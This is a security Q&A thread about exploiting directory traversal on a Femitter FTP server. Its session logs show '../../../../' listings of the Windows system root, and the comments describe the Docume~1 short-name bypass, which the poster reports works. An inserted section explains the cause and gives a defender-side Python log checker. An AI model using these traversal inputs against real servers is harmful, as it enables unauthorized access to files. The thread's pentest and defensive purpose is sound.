I am conducting a sanctioned pentest in a closed reference environment, and stumbled upon a seemingly simple issue that I currently cannot solve.
When attempting to execute a directory traversal attack against a vulnerable Femitter FTP server running on MS Windows, it is possible to do a LIST on the system root (addresses and content listings changed here for reference only):
# ftp 192.168.13.22
Connected to 192.168.13.22.
220 Femitter FTP Server ready.
Name (192.168.13.22:root):
331 Password required for root.
Password:
230 User root logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls ../../../../
200 Port command successful.
150 Opening data connection for directory list.
-rwxrwxrwx 1 ftp ftp 0 Sep 23 2015 AUTOEXEC.BAT
-rw-rw-rw- 1 ftp ftp 0 Sep 23 2015 CONFIG.SYS
drw-rw-rw- 1 ftp ftp 0 Sep 23 2015 Documents and Settings
dr--r--r-- 1 ftp ftp 0 Sep 23 2015 Program Files
drw-rw-rw- 1 ftp ftp 0 Sep 23 2015 WINDOWS
226 File sent ok
However, if I want to list the contents of a folder containing white spaces, such as Documents and Settings, I am not able to list the directory contents because the white spaces are being ignored.
ftp> ls ../../../../documents and settings/
usage: ls remote-directory local-file
ftp> ls ../../../../documents\ and\ settings
200 Port command successful.
150 Opening data connection for directory list.
/C:/Program Files/Femitter/Shared/../../../../documents not found
226 File sent ok
ftp> ls ../../../../documents%20and%20settings
200 Port command successful.
150 Opening data connection for directory list.
/C:/Program Files/Femitter/Shared/../../../../documents%20and%20settings not found
226 File sent ok
ftp> ls ../../../../'documents and settings'/
usage: ls remote-directory local-file
ftp> ls ../../../../"documents and settings"/
200 Port command successful.
150 Opening data connection for directory list.
/C:/Program Files/Femitter/Shared/../../../../documents not found
226 File sent ok
ftp> ls "../../../../documents and settings/"
200 Port command successful.
150 Opening data connection for directory list.
/C:/Program Files/Femitter/Shared/../../../../documents not found
226 File sent ok
I already tried using different FTP clients (CLI and GUI, on Linux and Windows) and they either ignore white spaces or disallow directory traversal.
I also tried scripting the attack in Python, using at first raw sockets and then ftplib to send the commands in HEX format directly to the FTP server, but with no success.
Googling for a couple of hours did not yield a working solution (yes, there were a lot of options, which did not work), which is why I am hoping there is someone here who has had the same issue. I am pretty sure that this is not the first time such a directory traversal with white spaces is needed.
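The root cause visible in the session above is a client-side one: in the FTP protocol the pathname argument of LIST (and RETR, CWD, ...) is everything after the verb up to the end of the line, spaces included, and it is the interactive client's own line parser that chops "documents and settings" into three words before anything reaches the server. The server-side lesson is the mirror image: it must take the whole remainder of the command line as the path, canonicalise it against the share root, and refuse anything that escapes the root, whether the escape is spelled with spaces, quotes, or the 8.3 short name mentioned in the comments below. The following checker is an added example (not code from the question or from the Femitter project) that parses raw FTP command lines the way a server or a log reviewer would and flags path arguments that leave the share root. The share root is assumed from the server's own error messages, the log lines are constructed, and the path check is purely lexical.

```python
"""
Defender-side checker for FTP pathname arguments (added example).

Parses raw FTP command lines, keeps the full pathname argument including any
embedded spaces, joins it lexically onto the share root and reports commands
whose normalised path escapes that root. All sample data is constructed.
"""
import posixpath
import re

# Assumed share root of the vulnerable server, taken from its error messages.
SHARE_ROOT = "/C:/Program Files/Femitter/Shared"

# FTP verbs whose argument is a pathname.
PATH_VERBS = {"LIST", "NLST", "RETR", "STOR", "CWD", "DELE", "MKD", "RMD", "SIZE"}

# Verb, then everything after the first run of whitespace is the argument.
LINE_RE = re.compile(r"^(?P<verb>[A-Za-z]{3,4})(?:\s+(?P<arg>.*))?$")


def parse_command(line: str):
    """Split a raw FTP command line into (VERB, argument).

    The argument keeps its internal spaces, unlike an interactive client's
    word splitting: 'LIST ../a b' -> ('LIST', '../a b').
    """
    line = line.rstrip("\r\n")
    m = LINE_RE.match(line)
    if not m:
        return None, None
    arg = m.group("arg")
    return m.group("verb").upper(), (arg.rstrip() if arg is not None else None)


def resolve_under_root(root: str, requested: str) -> str:
    """Join the requested path onto the share root and collapse '.' and '..'
    segments lexically, which is the minimum a server must do before touching
    the disk. Backslashes count as separators because the target is Windows,
    and surrounding double quotes (as sent by some clients) are dropped.
    """
    requested = requested.replace("\\", "/").strip('"')
    # For an FTP user a leading '/' still means 'top of the share', not 'C:\'.
    joined = posixpath.join(root, requested.lstrip("/"))
    return posixpath.normpath(joined)


def escapes_root(root: str, resolved: str) -> bool:
    """True when the normalised path is neither the root nor inside it."""
    return not (resolved == root or resolved.startswith(root + "/"))


def audit_log(lines):
    """Return (verb, argument, resolved_path) for every command whose path
    argument escapes the share root. Short names such as Docume~1 are caught
    here only because the '..' segments already leave the root; a real server
    on Windows should additionally compare the filesystem's real path, since
    8.3 names alias long names.
    """
    findings = []
    for line in lines:
        verb, arg = parse_command(line)
        if verb not in PATH_VERBS or not arg:
            continue
        resolved = resolve_under_root(SHARE_ROOT, arg)
        if escapes_root(SHARE_ROOT, resolved):
            findings.append((verb, arg, resolved))
    return findings


# Constructed command log, mirroring the session in the question plus the
# short-name variant from the comments. Not real server output.
SAMPLE_LOG = [
    "USER root",
    "PASS secret",
    "LIST",
    "LIST ../../../../",
    'LIST "../../../../documents and settings/"',
    "LIST ../../../../Docume~1",
    "RETR readme.txt",
    "CWD sub dir",
]

if __name__ == "__main__":
    for verb, arg, resolved in audit_log(SAMPLE_LOG):
        print(f"{verb} {arg!r} escapes share root -> {resolved}")
```

Running the block reports the three LIST commands that leave the share, while `RETR readme.txt` and `CWD sub dir` (a legitimate name with a space) are accepted, which is the point: the space itself is never the problem, the unconfined `..` is.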
Case sensitivity looks to be irrelevant for the FTP clients. At least the GNU/Linux FTP client lists directories ignoring the letter case. – None – 2016-02-23T18:38:34.280
@lockout: case sensitivity is a server side thing and not a client thing. The clients list the data the same way the server sends it and do not change the case. – Steffen Ullrich – 2016-02-23T18:46:01.450
@Steffen Ullrich: Thanks! This server is not case sensitive. And case sensitivity actually is not an issue here, but the white spaces, which terminate the directory traversal are. – None – 2016-02-23T18:50:52.130
@tim: thanks! The FTP server banner, as seen in the listing, is Femitter FTP server, and not the native Windows FTP service. It could be, but I doubt it, that this issue is limited to this server edition only. – None – 2016-02-23T18:54:32.693
Also give C:\Docume~1\ a try. – Dog eat cat world – 2016-02-23T22:15:19.527
Try escaping the spaces with \ or quoting the directory string – DavidPostill – 2016-02-23T22:34:21.250
@Dog eat cat world: Whoa, you are right about that notation! I had forgotten about that one. Will give that one a try now, and report back. – lockout – 2016-02-24T07:25:19.893
@DavidPostill: Thanks! The option you mentioned, besides some more white-space escape approaches, was already tried initially. You can see that in the listing above. – lockout – 2016-02-24T07:33:19.740
@Dogeatcatworld: Your suggestion worked! The Windows folder short notation C:\Docume~1\ had dropped out from my head completely! I will update the post with the solution. Could you please submit your answer also so that I can mark that one as a working solution? Thanks again – lockout – 2016-02-24T07:36:58.100
Hold your horses guys! :) I am a total newcomer to this forum, and I will post the solution promptly. Just thought it would be better if the user who suggested the working solution would add it to get proper credit. All calm down... thanks! – lockout – 2016-02-24T07:55:10.310
I am happy it worked for you @lockout. Since you have gone through the trouble of answering your question, it is fine by me that you accept it as the answer. Thanks for crediting me. – Dog eat cat world – 2016-02-24T11:24:07.603